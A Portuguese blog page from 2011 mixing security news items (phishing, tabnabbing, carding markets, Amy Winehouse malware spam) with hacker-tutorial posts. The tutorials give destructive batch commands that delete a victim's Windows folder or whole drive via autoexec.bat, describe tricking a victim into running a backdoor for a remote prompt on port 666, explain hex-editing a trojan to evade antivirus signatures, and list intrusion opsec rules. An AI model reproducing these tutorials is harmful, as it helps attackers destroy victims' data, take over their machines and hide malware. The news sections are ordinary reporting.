Páginas

quarta-feira, 27 de julho de 2011

Mais um golpe relacionado com registro de domínio - Não pague boleto da Registro Brasil

Mais um boleto fraudulento, cobrando hospedagem de site e domínio, anda circulando pelo Brasil.

Desta vez o boleto parte da Registro Brasil (Brasil Serviço em Tecnologia da Informação LTDA), no valor de R$ 130,00... Até que não são tão gananciosos assim... No mesmo esquema dos golpes anteriores, e não duvido que por trás desta empresa estejam os mesmos pilantras, o boleto até pode ser considerado lícito, pois cobra por suposto serviço de hospedagem que o cliente tenha contratado, via pagamento do boleto. Porém, todo cliente que já pagou pelo domínio do seu site e também pela hospedagem, não precisa pagar por esta duplicidade. Além disto, confundem os usuários pois usam o mesmo nome da Registro Brasil (www.registrobrasil.com), uma empresa séria que atua na área de registros de domínios. O endereço eletrônico da empresa pilantra é www.registrobrasilonline.com.  

Para não cair neste e noutros golpes que virão, nunca pague por boleto recebido pelo correio. A cobrança sempre virá por email, emitido pelo CGI.BR - Comitê Gestor de Internet do Brasil.

Quanto à hospedagem do site, verifique se é realmente o servidor que você contratou para hospedar sua página. Em caso de dúvida, consulte o seu servidor ou a agência que desenvolveu seu site. Mas basta ver que o valor não bate com o que você contratou para jogar o boleto no lixo na hora!

Sempre desconfie de tudo o que vier por email ou por correio, e que seja cobrança ou links suspeitos. A maioria da informação que circula pela web é lixo, e quando a informação ou cobrança realmente for para você, ela virá através de modos tradicionais, já conhecidos por você ou através de intimações judiciais, entregue em mãos. Pela internet, só se for algum amigo ou algo solicitado por você, senão é bandido. Fica ligado!

Para questões de domínios e hospedagem, grude no desenvolvedor de seu site, seja ele pessoa ou empresa, e consulte-o sempre que estiver com dúvidas. Vale mais a pena gastar um pouco com a consultoria do quê perder uma bolada com os pilantras que rondam a internet. Este aviso vale também para quem utiliza internet banking. Vale uma ou duas horas de consultoria para saber agir com segurança quando acessar a internet para extratos, pagamentos, transferèncias bancárias.

Comandos Bat

COMANDOS BAT@echo off = não mostra os comandos que serão executadoscls = limpa a telaecho D4rkness= aparecerá na tela "D4rkness" por exemploecho > threat.bat por RedeHacker = crirá um arquivo threat.bat e nele terá escrito "por RedeHacker"echo > threat.bat c:\deltree /y windows = criará um arquivo, com nome threat.bat, no hd da pessoa que quando executado apagará a pasta windows sem nenhuma perguntamd redehacker.com = cria uma pasta com nome "redehacker.coml" no hd da pessoadel *.xxx (onde xxx é a extenção do arquivo) = paga os arquivos com a extenção desejada exemplo: del c:\windows\*.ini = apaga os arquivos .ini da pasta do windowsdeltree /y windows = apada o diretório do window$ sem perguntar sim ou nãoren autoexec.bat autoexec.seunick = renomeia o autoexec.bat para o nome que você quiserGOTO: este comando faz repetição de comandos da seguinte maneira::INI = indica para onde você quer voltarGOTO INI = volta para onde o :INI estiver ( não precisa ser INI pode ser oq vc quiser com os dosi pontos antres e depois o mesmo nome com GOTO antesCHOICE /c 123 = mostra um prompt de questão e você precisa do seguinte comando (pode ter quantos números você quiser)IF ERRORLEVEL 2 DES = desliga o pc se a pessoa digitar 2IF ERRORLEVEL 1 REI = reinicia o pc se a pessoa escolher 1(as mensagens e os nomes dos arquivos podem ser alteradas por você)

Invasão pela porta 666

Invasão pela porta 666É uma invasão fácil, mas você irá precisar do programa Aabout (www.dolphinsys.com).E a vítima também.Procedimento:Primeiro você deve contactar a vítima e fazê-la executar o programa Aabout, depois entre no telnet do windows (C:\windows\telnet.exe). Vá ao menu Conectar e clique em Sistema Remoto. Vai aparecer uma tela para o login. Como host, coloque o IP dinâmico da vítima e como porta, digite 666. Clique em conectar. No login, digite a palavra gr! (é 'gr' com o ponto de exclamação)Agora aparece um PROMPT, no qual você tem controle total sobre o PC da vítima. Use os comandos do DOS.
E também você pode abrir o telnet mais facil!
INICIAR / EXECUTAR /CMD (win xp / win 98 é command) / telnet / open /IP do azarado(a)

Camuflando Virus por números Hexadecimais

Antes de começarmos eu sei que irá haver muitas perguntas sobre o por que de se editar hexadecimalmente um trojan, tudo está diretamente relacionado à como o vírus é detectado pelo anti-vírus... O seu anti-vírus procura pelo código hexadecimal dentro dos programas para ver se batem com os números hexadecimais que ele tem guardado em sua assinatura (aquele arquivo que é atualizado constantemente), se coincidir os números, é vírus hehe. Tendo essa idéia em mente, uma saída simples é essa: altere esse código que está cusando problemas! Como? vamos lá: Precisamos de: -Um editor hexadecimal (usaremos o HEXPlorer por ser freeware) Download-Um server de qualquer trojan -E por último um anti-vírus Simplesmente após criar seu server (deiche seu anti-vírus desligado), abra ele com o Hexplorer, vários números aparecerão. Role a tela até mais ou menos a metade, selecione TODOS os números dalí para baixo. Após feito isso, note um botão no canto superior direito, ele tem o formato de um ZERO, clique nele, perceba que todos os números selecionados viraram ZEROS. Para compreender o quê isso está fazendo é simples, o ZERO na linguagem hexadecimal significa um ponto sem operação, o ZERO é nulo... Após feito isso salve o arquivo em um outro local, vá até aquele local, e apertando o botão direito, selecione a opção do seu antivírus que diz para escanear por vírus. Se o seu anti-vírus achou alguma coisa, exelente, isso significa que o código que o indentifica como sendo um vírus está na parte inferior de todos aqueles números hexadecimais. Se achou algo é o contrário, o código está na parte superior. Agora vamos para a parte menos complicada, volte para o hexplorer e dê um CTRL+Z para voltar ao formato original. Se seu anti-vírus não localizou nada, comece "zerando" os números por partes de baixo para sima, se ele localiou, comece pelo contrário. Após localizar os números hexadecimais que seu anti-vírus capta como sendo um vírus, mude-os de forma que não afete o arquivo...
Observação: -Não pence que será fácil mudar os números sem corromper o arquivo; -Não pence que TODOS os antí-vírus não irão mais detectar seu vírus, isso ocorre por que cada anti-vírus possue um número diferente que identifica o vírus como sendo o próprio. Mais não fique desanimado, muitos anti-vírus possuem assinaturas iguais para pegar os vírus... -E por último mas mais importante: fassa seu próprio trojan. Mantenha ele em versão privada para somente o você usar, e compartilhe com os outros como o mesmo foi feito.

21 Conselhos Para um Hacker

1-Descobriu algo novo,OLHE!
2-NÃO apague, pense no que seria melhor,ter acesso a um provedor ou detona-lo.
3-NÃO MODIFIQUE NADA, a menos q queira q saibam q vc esteve lah.
4-Nunca tente um su root direto! issu fica logado.
5-Não fique dando telnet ou pegando mail usando acesso dos outros.
6-Nunca subestime um sysop.
7-Escolha o periodo de noite entre meia noite as seis horas.
8-Uma lah dentro tente dominar o lugar,é claro, com cautela.
9-Não confie em ninguem.
10-Se pear a senha do root de algum provedor e não souber oq fazer MATE-SE.
11-Não teste virus no seu próprio HD.
12-É bom preparar bem uma estratégia antes de atacar.
13-Uso um computador de sua Universidade(é mais seguro).
14-Não fique distribuindo informações para ninuem ou dados sobre o que vc pegou.
15-NÃO OBEDEÇA A REGRAS.Claro que estas tem que ser cumpridas(e as do forum tb hehehe).
16-Não tenha pena de ninguem.
17-Vc usa MS-DOze ou o Windoze?Não conte para ninguem.
18-Vc usa UNIX ou LINUX? esteja certo de q esta bem seguro.
19-Não crie laços afetivos com a vítima.
20-Aprenda o maximo que puder com quem sabe mais!Não se meta a besta direto.
21-Não se submeta a nenhuma sistema hierarquico.

Dicas do windows

Mudando musica de Inicialização,sinais de alertas e etc...

Se vc esta cansado daqueles sinais de alertas do windows ouate mesmo da muica de inicialização vc podera muda -las

Vá em C:\windows\medianote q todos sinais de alertas e musicas do windows ficam nesta pasta,até ai nenhum segredo(acho q naum havera segredo nenhum em modificar isto)Tendo o otque ou ate mesmo musica q vc quer modificar em mente basta ir em executare iniciar o sndrec32.exe,sim o gravador de som do windows e gravar um trecho do toque q vc tem em mente q mas o agradapor exemplo vou modificar a musica de inicializaçãoIntaum gravo trecho da musica ou do toque e salvo com o nome Inicializaçãodo windows Xp e substituo pelo verdadeiro na propia pasta, e reinicio o computador pronto o trecho da musica q gravei tocou como musica de inicializaçãoLembrando q todo toque ou musica q eu quiser substituir deve conter o mesmo nome do qual desejo modificar

Bom como disse num tem nenhum segredo nisso ,mas da pro gasto

Criando Virus

Em primeiro lugar, você deve abrir o MS-DOS e seguir os passos abaixo:
Digite: Edit (nome do seu arquivo).bat, deverá aparecer uma tela azul.
Entre com os comandos: @ECHO OFF e BREAK OFF.
A página deverá ficar da seguinte maneira, como está embaixo:
@ECHO OFFBREAK OFF.
Depois disso, a pessoa escolhe o que seu vírus deve fazer.
Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá a certeza de estar executando seu vírus ao iniciar o computador-alvo. Agora vamos supor que o seu vírus seja capaz de apagar todos os arquivos do PC alheio.
Você deve usar o seguinte comando:deltree/y c:\*.* Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o arquivo e pronto! Importante:
Caso a pessoa passe esse vírus via disquete, ele não deve esqueçer de finalizar o arquivo com o comando deltree/y a:\*.*. Isso serve para não deixar vestígios de seu ato insano.

Lion alcança um milhão de downloads no primeiro dia

Lion alcança um milhão de downloads no primeiro dia
Num só dia, mais de um milhão de utilizadores compraram e descarregaram o Mac OS X Lion, a oitava e mais avançada versão do sistema operativo Apple. A notícia é avançada pelo El Mundo.
A empresa avançou que os utilizadores estão a adquirir o Lion, disponível na Apple Store por 23,99 euros, mais rapidamente do que qualquer outro sistema operativo na história da multinacional. "O Lion descolou em grande força, a valorização dos utilizadores e a reacção da industria tem sido fantásticas", assegura o vice-presidente de marketing da Apple, Philip Schiller.
O Lion confere ao Mac mais de 250 novas características, incluindo novos gestos de funcionalidade no trackpad, novas aplicações, como o "Mission Control", uma inovadora forma de ver tudo o que está a fazer no computador, assim como a Mac App Store e o Launchpad, um novo lugar para as aplicações.
A Mac App Store é uma das grandes inovações e vai estar disponível em 123 países. Em vez da usual App Store, com aplicativos para todos os produtos Apple, a Mac App Store é exclusiva a computadores Mac, e traz milhares de novas aplicações, que podem ser compradas através do iTunes. A nova loja de aplicações estará também disponível aos utilizadores do Snow Leopard, o sistema operativo mais antigo, via actualizações de software.

 

Hackers podem explodir baterias de portáteis Apple

Steve Jobs apresenta o novo Mac Book Pro.
Os novos MacBook, MacBook Air e MacBook Pro, da gigante norte-americana Apple, possuem uma falha na segurança que pode permitir a hackers impedir as baterias de carregar. À distância, os hackers podem ainda explorar mais o erro e fazer com que as baterias explodam.
O site de tecnologia BGR avança a informação de que os novos computadores portáteis da Apple tem uma tecnologia de bateria "inteligente", que foi desenvolvida para proporcionar um maior controlo sobre a gestão de energia da bateria.
Lamentavelmente, a tecnologia dá também mais controlo aos hackers, devido a um microship, dentro do computador, a que se pode ter acesso remotamente, usando apenas uma password partilhada por todos os portáteis.
Charlie Miller, o especialista em segurança que descobriu a falha, planeia apresenta-la no próximo mês na conferência de segurança Black Hat. Miller vai demonstrar que consegue ter acesso remoto à bateria do computador e fazer com que esta não carregue, ou então, que carregue até sobre-aquecer, até pegar fogo e explodir. "Estas baterias não são feitas a pensar na existência de hackers", disse Miller à revista Forbes. "O que eu estou a mostrar é que é possível usá-las para fazer algo muito mau".
Apesar de tudo, Charlie pretende também mostrar uma solução para a falha, que a Apple poderá implementar o mais depressa possível

Polícia prende pirata informático na Escócia

Era o porta-voz do grupo LulsSec, vinculado ao Anonymous, que atacou vários sites de empresas e governos em todo o mundo

Um jovem de 19 anos foi detido esta quarta-feira na Escócia no âmbito de uma investigação internacional sobre os grupos de piratas informáticos Anonymous e LulzSec.

Segundo a Scotland Yard, o alegado «hacker» foi detido nas ilhas Shetland e identificava-se na rede como porta-voz desses grupos, sendo conhecido como «Topiary».

O LulzSec, um grupo de hackers vinculado ao Anonymous, declarou ter sido responsável por diversos ataques a sites de empresas e governos em todo o mundo. «Topiary» reconheceu, recentemente, em entrevista à agência Associated Press, que era um dos seis principais membros do LulzSec.

Todos os seus registos no twitter foram apagados na terça-feira, excluindo apenas uma, que diz: «Uma ideia não pode ser presa».

terça-feira, 26 de julho de 2011

Nova técnica rouba dados através da distração com abas do browser

O PandaLabs, laboratório Anti-Malware da Panda Security, descreveu uma nova técnica de phishing em seu Relatório Trimestral Sobre Ameaças de TI, referente aos meses de abril, maio e junho deste ano.

De acordo com os especialistas da empresa, o novo método, denominado Tabnabbing, explora o sistema de abas dos navegadores para modificar páginas sem que o usuário perceba e, com isso, consegue obter seus os dados e senhas.


O Tabnabbing foi documentado pela primeira vez em maio. Por enquanto, ainda não se sabe se a técnica já foi utilizada ou se ainda é apenas uma prova de conceito, mas, para a companhia, “proporciona  uma reflexão sobre o nosso comportamento”.

De acordo com Ricardo Bachert, diretor de consumo da Panda Security no Brasil, a maioria das pessoas abre várias abas de uma só vez e perde a noção do que está usando. “Através dessa nova técnica, os criminosos modificam em alguns segundos a página não utilizada, mantendo a aparência original para que usuário não perceba a alteração e tente fazer o login, enviando seus dados para eles”, explica.

Como funciona
Para realizar um ataque, primeiro a vítima é levada a acessar uma página maliciosa, através de spam, engenharia social ou posts em fóruns, por exemplo. Em seguida, é usado um comando de JavaScript para detectar quando o usuário não está visualizando a página, enquanto navega em outra guia do browser.

Em alguns segundos, para assegurar que o usuário se esqueceu daquela aba aberta, seu conteúdo é modificado, também através de JavaScript, para exibir uma página falsa de algum serviço popular, como o Gmail, por exemplo.

Quando a vítima insere seu endereço de e-mail e senha para efetuar o login, a página falsa armazena os dados e redireciona o usuário para a página original.

“Não queremos alarmar os usuários, mas é importante que eles sejam cautelosos em todos os momentos para não serem vítimas do próprio deslize e que mantenham sua solução de segurança sempre ativa e atualizada”, ressalta Eduardo D’Antona, diretor corporativo e TI da Panda Security no Brasil.

“Isso, junto com a implementação de políticas de segurança adequadas, permitirá que o usuário utilize seu computador sem se tornar vítima de truques de engenharia social”, conclui. Além disso, o PandaLabs aconselha os usuários a fecharem todas as guias que não estão sendo utilizadas para evitar o roubo dos dados através desta nova técnica.

Criminosos vendem dados bancários roubados a partir de US$2

Com apenas US$2 no bolso, é possível adquirir dados roubados de cartões de crédito em mais de 50 lojas online. Mas o acesso não é fácil: ocorre apenas depois de um contato prévio com cibercriminosos através de fóruns e chats.

Esse é o alerta do PandaLabs, laboratório anti-malware da Panda Security, que descobriu uma rede de comercialização de dados bancários roubados e diversos produtos ilícitos. Entre eles, estão até mesmo cartões de crédito físicos e máquinas para clonagem.


Quanto às informações roubadas, incluem logins e senhas por US$2 sem garantia de saldo nem dados adicionais. Caso o comprador quiser ter certeza da disponibilidade do cartão de crédito ou do saldo da conta bancária, o preço sobe para os US$80 para contas com saldos menores e chega a US$700 para aquelas com quantia garantida de US$82 mil.

Os preços aumentam se as contas tiverem um histórico de compras online ou de utilização de plataformas de pagamento como o PayPal, variando entre US$10 e US$1500. Outras “ofertas” passam pela clonagem de cartões (a partir de US$180), máquinas para clonagem de cartões (US$200 a US$1.000), e até caixas eletrônicos falsos (a partir de US$3.500, dependendo do modelo).

Existem também serviços adicionais de lavagem de dinheiro, disponíveis em troca de comissões entre 10% e 40% da operação. Os cibercriminosos também se oferecem para desenvolver lojas online falsas para obter dados bancários e dinheiro dos usuários através de técnicas de rogueware (software falso). Esse mercado negro online oferece ainda aluguel de botnets para envio de spam.

O “espertinho” que pensar em entrar nesse esquema corre tantos riscos quanto suas futuras vítimas. “O primeiro alvo do crime são os dados pessoais e senhas de sua própria clientela”, alerta Eduardo D’Antona, diretor corporativo e de TI da Panda Security. Esses clientes, aliás, também são fáceis de localizar. “A bandidagem cirbernética dispõe de recursos técnicos muito mais avançados para se manter anônima do que o indivíduo seduzido pelas supostas vantagens oferecidas nesses sites”, explica Ricardo Bachert, diretor de consumo da companhia. Para ele, a varredura dos consumidores desse tipo de comércio é o pontapé inicial para o combate ao cibercrime.

A Panda lembra que, assim como em qualquer outro tipo de negócio, o mercado negro tem todos os ingredientes mercadológicos, como concorrência e lei da oferta e da demanda, para garantir competitividade. No entanto, o anonimato é uma prioridade e muitos vendedores utilizam fóruns clandestinos para se manterem escondidos.

Mais de 57 mil sites falsos são criados por semana

A cada semana, cibercriminosos criam mais de 57 mil novos endereços falsos de sites para enganar usuários e, então, roubar os seus dados.

Para isso, mais de 375 marcas de empresas e nomes de instituições reconhecidas mundialmente são usados para manter as fraudes no topo dos resultados dos principais motores de busca, de acordo com um estudo do PandaLabs, laboratório anti-malware da Panda Security.


Essa ameaça exige cuidado dos internautas a acessar sites a partir de pesquisas realizadas na web. Isso porque, através da técnica BlackHat SEO, os cibercriminosos conseguem posicionar os sites maliciosos nas primeiras posições dos resultados. “Sabemos que os sites de busca estão se esforçando para melhorar a situação, ao alterar seus algoritmos de indexação, mas eles não conseguirão fugir da avalanche dos novos endereços que são criados todos os dias”, afirma Ricardo Bachert, diretor geral de consumo da Panda Security Brasil.

Além disso, a Panda lembra que muitas das páginas falsas têm a aparência idêntica à das originais, o que facilita o roubo de logins e senhas do usuário. O estudo listou os tipos de empresas mais utilizadas pelos exploradores do BlackHat SEO como base para sites fraudulentos. Confira o ranking:

1.    Bancos – 65%
2.    Lojas Online – 26,81%
3.    Fundos de Investimentos e Corretoras – 2,30%
4.    Organizações Governamentais – 1,92%
5.    Plataformas de Pagamento – 1,80%
6.    ISPs – 1,31%
7.    ONGs – 0,45%
8.    Empresas de Telefonia – 0,25%
9.    Logísticas – 0,24%
10.    Jogos – 0,10%
11.    Software – 0,10%

Em uma década de cibercrime, os prejuízos chegam a bilhões


A última década marcou a evolução das ameaças virtuais e sua ascensão como uma nova forma de crime, causando prejuízos de bilhões de dólares. Só o worm MyDoom, por exemplo, que começou a atacar em 2004, causou danos estimados em US$38 bilhões no mundo inteiro.

Para se ter uma ideia desse crescimento, entre 2008 e 2009 as perdas dos consumidores causadas pelo cibercrime duplicaram para US$560 milhões somente nos Estados Unidos, de acordo com o Centro de Reclamações de Crime pela Internet, respaldado pelo FBI.



Para desvendar as atividades dos cibercriminosos ao longo dos dez anos que passaram, a McAfee apresenta o estudo "Uma boa década para o cibercrime". Para o diretor de pesquisa de segurança e comunicação do McAfee Labs, Dave Marcus, hoje o cibercrime é um dos setores que mais cresce e lucra. "Desde a criação do vírus (worm) 'I Love You', em 2000, até as ameaças atuais, observamos que esses cibercriminosos e suas táticas tornaram-se mais sofisticados. Os dias de danos ou destruição, que serviam apenas para os hackers se vangloriar, acabaram. O que importa agora é ganhar dinheiro e não ser apanhado", alerta.

No início dos anos 2000, a intenção dos cibercriminosos era chamar a atenção do mundo. Esse objetivo foi alcançado com ataques de negação de serviço (DoS) para desativar sites populares, como o CNN, Yahoo e eBay, inundando-os com tráfego. Nos anos seguintes, a preocupação passou a ser o lucro.

Foi então que surgiram ameaças como adwares, programas que exibem publicidade em troca do direito do usuário de utilizá-lo gratuitamente; e spywares, que coletam rastros e dados do internauta. Outros softwares maliciosos, como rootkits, e o aumento dos golpes de phishing, tornaram o cibercrime uma atividade com menos riscos do que o crime convencional e altos lucros. Apenas com scareware, ou seja, antivírus falsos que exigem a compra de uma licença para remover malwares que não existem, essa “indústria” já lucrou mais de US$180 milhões.

Entre as ameaças que causaram mais prejuízos, está o worm I love you, criado em 2000. Ele se espalhava disfarçado de uma carta de amor e, uma vez no sistema da vítima, passava a se espalhar entre todos os seus contatos. Esse malware custou a empresas e a agências do governo US$ 15 bilhões para desativar seus computadores e remover a infecção.

A contaminação em massa causada pelo worm MyDoom em 2004 lidera a lista da McAfee em termos de prejuízos financeiros, estimados em US$ 38 bilhões. Também disseminado através de e-mails, o worm reduziu o acesso global à Internet em 10% e a alguns sites em 50% devido ao enorme volume de spam enviado.

Ao analisar as futuras tendências do cibercrime, o McAfee Labs prevê a continuação de golpes e truques envolvendo redes sociais, como links mal-intencionados, solicitações de amigos falsas e tentativas de phishing. Os golpes provavelmente devem ficar mais sofisticados e personalizados e aproveitarão a popularidade dos dispositivos móveis para infectar um número ainda maior de usuários.

Brasil fica em 3º lugar no envio de spam

Atualmente, o Brasil é o terceiro colocado no ranking dos países que mais enviam spam, de acordo com o mais recente relatório do TrendLabs, rede global de laboratórios especializada em segurança virtual da Trend Micro.

O país, que no final de 2009 estava no topo da lista, ficou atrás apenas dos Estados Unidos e Índia.

Imagem: Trend Micro

De acordo com a companhia, uma das temáticas mais exploradas pelas mensagens indesejadas foram as notícias falsas sobre mortes de celebridades, uma tendência também observada pela Symantec. Esses e-mails servem como isca para cibercriminosos espalharem malwares.
A fraude nigeriana (ou golpe 419), no qual criminosos mandam e-mails pedindo uma contribuição monetária em troca de um suposto ganho a baixo custo, também ficou em evidência. No período analisado, os fraudadores se passaram por integrantes de uma divisão de monitoramento antiterrorista do FBI, em Washington, que sequer existe.

Quanto à prevenção, a Trend Micro aponta algumas medidas fundamentais. Tomar cuidado ajuda a reduzir as ameaças de engenharia social, enquanto produtos com serviço de reputação de e-mails previnem a chegada das mensagens de spam à caixa de entrada do usuário. 

Já O serviço de reputação da Web bloqueia o acesso do usuário a sites maliciosos, como como sites comprometidos, maliciosos e de phishing, e o sistema de reputação de arquivos detecta e previne o download e execução de qualquer arquivo malicioso.

Cibercriminosos exploram morte da cantora Amy Winehouse

Após a morte de Amy Winehouse, neste final de semana, já começam a circular mensagens maliciosas tanto pelas caixas de e-mail quanto através das redes sociais. Um dos golpes detectados chega na forma de spam oferecendo novidades sobre o ocorrido, trazendo um link que tenta se passar por um site de notícias conhecido.

Com o assunto “Agencia de noticias inglesa divulga foto exclusiva do corpo de Amy Winehouse ao ser encontrada. Bebidas e possiveis drogas sao vistas com clareza” (sic.)”, o e-mail, na verdade, inclui a URL para download de um cavalo-de-Troia especializado em roubar senhas bancárias, alerta a Trend Micro.



O corpo das mensagem traz um falso link de notícias do G1 (hxxp://g1.globo.com/pop-arte/noticia/2011/07/policia-inglesa-divulga-fotos-do-corpo-da-cantora.html-0.11675). O endereço, que já foi bloqueado, carregava um malware detectado como "TROJ_BANKER". De acordo com a empresa, mais de 17 mil pessoas já executaram o arquivo, capaz não só de invadir contas bancárias como também de roubar senhas do Hotmail.

Assim que o usuário clica na URL, baixa o arquivo malicioso, que abre uma tela do Internet Explorer direcionada para uma página falsa do Google. A ameaça se instala na máquina da vítima como "googlebar.exe" e é executada toda vez que o Windows é iniciado.

O malware também altera o arquivo Hosts do Windows, inserindo endereços de páginas de Internet banking. Assim, quando o usuário tentar acessar algum desses sites, será redirecionado para uma página clonada, desenvolvida para roubar informações confidenciais como senhas, logins e números de segurança.

O Facebook também está servindo de vetor para golpes que se aproveitam da morte da cantora. A rede ThreatSeeker do Websense Security Labs detectou mensagens na rede oferecendo ‘vídeos de Amy Winehouse momentos após a sua morte', e outros semelhantes.


Na verdade, não existe nenhum clipe desse tipo, mas o teor da menasgem atrai um grande número de pessoas. Quem clicar no link, será vítima de um “golpe de pesquisa”, que requer o preenchimento de informações em troca de um vídeo ‘exclusivo’. O procedimento apenas transfere dados pessoais aos cibercriminosos, que podem lucrar com as informações obtidas.


“Tudo cuidado é pouco ao clicar em notícias de última hora. As redes sociais e máquinas de busca são alvo de muito abuso pelos criadores de malware. Se você quer saber mais de alguma notícia, uma alternativa mais segura é uma página de notícias da sua confiança”, alerta Elad Sharf, do Websense Security Labs.

A Trend Micro ainda recomenda que os usuários mantenham seus antivírus atualizados e sempre desconfiem de supostas informações que chegam pelas redes sociais. Além disso, a empresa ressalta a importância de acessem os links de sites de notícias diretamente pelo navegador, ao invés de clicar em URLs oferecidas por sites de busca ou mensagens de e-mail.

Novo ataque chega por e-mail com CPF da vítima

Cibercriminosos estão enviando mensagens de phishing por e-mail com uma novidade alarmante: além de nomes e logomarcas dos grandes bancos brasileiros, incluem o nome completo e do CPF do usuário tanto no assunto quanto no corpo do e-mail, em uma tentativa de legitimar a mensagem falsa.

O CPF é o número que identifica cada cidadão brasileiro perante o governo. Sem ele, é impossível abrir conta em bancos, tirar título de eleitor, fazer empréstimos, ter carteira de trabalho ou prestar concursos públicos. Com toda essa importância, a sua divulgação deve ser controlada, conforme a Kaspersky Lab.

De acordo com a companhia de segurança, a posse desse número permite que criminosos roubem a identidade da vítima ou, ainda, produzam mensagens personalizadas com a inclusão de links maliciosos. Outro problema é o desvio de dinheiro, como no caso do mecânico que teve seus dados roubados por estelionatários, entre eles o número do CPF, e ficou com uma dívida de R$685 mil.

A Kaspersky lembra que essa não é a primeira vez que os usuários brasileiros são abordados com esse tipo de golpe. No ano passado, clientes de uma empresa aérea foram alvo de mensagens maliciosas que mostravam não só o nome completo como também o número do cartão do programa de pontos por fidelidade.

Geralmente, os criminosos conseguem obter essas informações confidenciais a partir de incidentes de vazamento de dados, que podem ocorrer de várias formas, como a invasão de servidores ou pela perda de notebooks ou pendrives com informações corporativas. “Infelizmente não existem muitas formas de se proteger, pois quando o usuário se cadastra em um site de comércio eletrônico e tal empresa sofrer um ataque, automaticamente os dados roubados permitem que todos se tornem vitimas em potencial”, afirma Fábio Assolini, analista de malware da companhia, no blog ThreatPost da Kaspersky.

Tanto o CPF quanto outros dados do cidadão podem ser facilmente adquiridos pela Internet ou em bancas de camelô por preços que variam de R$350 até R$1000. Portanto, o usuário precisa ser extremamente cauteloso ao receber e-mails, mesmo quando exibem seus dados pessoais.

segunda-feira, 25 de julho de 2011

Facebook bloqueia acesso a app "secreto" para iPad

Estudante havia descoberto aplicativo para o tablet dentro da nova versão do software para iPhone; programa é prometido há tempos

Pouco após o app “secreto” do Facebook para iPad ter "vazado", a rede social bloqueou o login por meio do software, de acordo com Marvin Bernal, um estudante de engenharia da computação que anteriormente havia explicado como destravar o novo programa.
“Parece que o Facebook desabilitou logins pela versão para ‘iPad’”, disse Bernal em uma mensagem no Twitter na tarde de hoje, 25/7. “Agora é hora de esperar por um lançamento oficial.”
De acordo com Bernal e outros usuários, o app do Facebook para iPad está escondido dentro da versão 3.4.4 do software para iPhone, que chegou à App Store na última sexta-feira como um patch para vários bugs e para restaurar o botão Send em várias seções do site de rede social.
Os usuários tem pedido um aplicativo oficial do Facebook para iPad, mas a rede social parecia mais interessada em promover a causa do HTML5. Há algumas semanas foi noticiado que um app para o tablet finalmente estava prestes a ser lançado, mas aí...nada aconteceu. Mas agora parece que o Facebook realmente tem trabalhado duro em uma versão para o tablet da Apple. Resta saber quando será o lançamento da versão oficial.

quarta-feira, 20 de julho de 2011

Apple atualiza linha de computadores MacBook Air e Mac mini

A Apple atualizou dois de seus computadores, MacBook Air e Mac mini, com processadores de última geração e novo sistema operacional, informou a companhia nesta quarta-feira (20).

O novo MacBook Air é equipado com os mais recentes processadores Intel Core dual e é acionado pelo sistema operacional Lion.

Já a nova configuração do Mac mini possibilitará o dobro do desempenho de processamento e de gráficos em comparação com a versão anterior, segundo a empresa.

Na terça-feira, a Apple registrou lucro trimestral maior do que o esperado, com forte alta na receita, impulsionada por vendas elevadas de iPhones e tablets iPads.


Pacotão: funcionamento da heurística e roteador Wi-Fi

Chegamos a outra quarta-feira e, com isso, a outra pacotão da coluna Segurança Digital do site. Hoje respondemos as seguintes dúvidas: o que é afinal a heurística para a detecção de pragas virtuais? O que é a diferença de “Mbps” em um roteador Wi-Fi? Existe equivalência ou compatibilidade dos programas (e dos vírus) de Windows no Linux? Confira!

>>> Funcionando da varredura por vírus
Poderia explicar a detecção de um antivírus? Sei que alguns varrem o PC por vírus conhecidos com assinaturas digitais. Agora essa heurística - ela procura o que afinal?
Sergio Fernando Ferreira do Nascimento

A assinatura que os antivírus usam nada mais é do que um trecho do código do vírus, que permite identificar a praga unicamente entre todos os outros arquivos do PC. É uma “marca” do código do vírus.

Já a heurística é um nome genérico para um conjunto de tecnologias que permitem a identificação de um vírus sem que o software precise de uma assinatura específica para ele. Não existe uma definição clara para o que é a heurística – as empresas usam como forma de mostrar que não dependem apenas de assinaturas, embora isso hoje não seja muito impressionante, já que a grande quantidade de vírus novos criados a cada dia obriga que algo além de assinaturas seja utilizado.

A heurística pode depender de uma análise do arquivo e suas funções, buscando por coisas mais genéricas e comuns a vírus. Por exemplo, um método heurístico pode suspeitar de arquivos que tenham uma rotina de envio direto de e-mails, que é muito comum em pragas que se espalham por esse meio, mas que não comum em outros softwares de correio eletrônico, que enviam e-mail usando um servidor SMTP em vez de fazer isso diretamente.

Assinaturas genéricas podem ser interpretadas de forma mais flexível, buscando trechos de código em diferentes partes do arquivo – algo que não seria possível com um sistema de verificação simples de assinatura.

Observando essas características e juntando outros fatores, um antivírus pode dar uma “pontuação” para um arquivo, indicando o quão suspeito ele é. Quando um software permite que você configure a agressividade da heurística, normalmente é uma configuração que, nos bastidores, estabelece a pontuação mínima para o antivírus dar um alerta. É claro que, com isso, podem acabar ocorrendo alarmes falsos.

Por isso mesmo que números de heurísticas devem ser vistos com, no mínimo, suspeita. Um software pode detectar milhões de dados como maliciosos, mas eles precisam ser analisados manualmente para comprovar que existe o problema, já que a heurística é sujeita a erros.

>>> Roteador
Eu tenho conexão 3G na minha casa e queria comprar um roteador 3G para usar com os outros equipamentos. Gostaria de saber no que difere 54, 100, 150, 300 Mbps?Rafael Medina

É simples Rafael: é a velocidade máxima de transferência do roteador. Como a conexão 3G não chega a essas velocidades, não vai fazer diferença nenhuma no acesso à internet. Esses números também não têm relação direta com a potência (alcance) do roteador.

A diferença vai ficar por conta do acesso entre os computadores da própria rede. Se você quiser ligar vários computadores nessa rede e transferir dados entre eles – por exemplo, um jogo, ou outros arquivos – a velocidade total será maior, permitindo inclusive que mais computadores sejam conectados ao mesmo tempo na rede sem fio.

Isso não interfere de modo algum na segurança do roteador. O que você deve observar, quanto à segurança, é o tipo de autenticação disponível, embora praticamente qualquer roteador hoje tenha suporte a WPA2 – que é a tecnologia que você quer utilizar se deseja manter sua rede sem fio segura.

Observe, porém, mais um detalhe: velocidades acima de 54 Mbps dependem do protocolo 802.11n, que opera em uma frequência diferente. Além de ter um alcance diferenciado, ele pode causar mais interferência e nem todos os receptores aceitam esse padrão.

>>> Migração para Linux
Estou querendo migrar para o Linux Ubuntu, mas vou começar a estudar na área de Webdesign, Desenvolvimento web. Existem softwares para Linux que possam "substituir" de certa forma a suíte Adobe e se é possível trabalhar nessa área usando o Linux?
Andrei

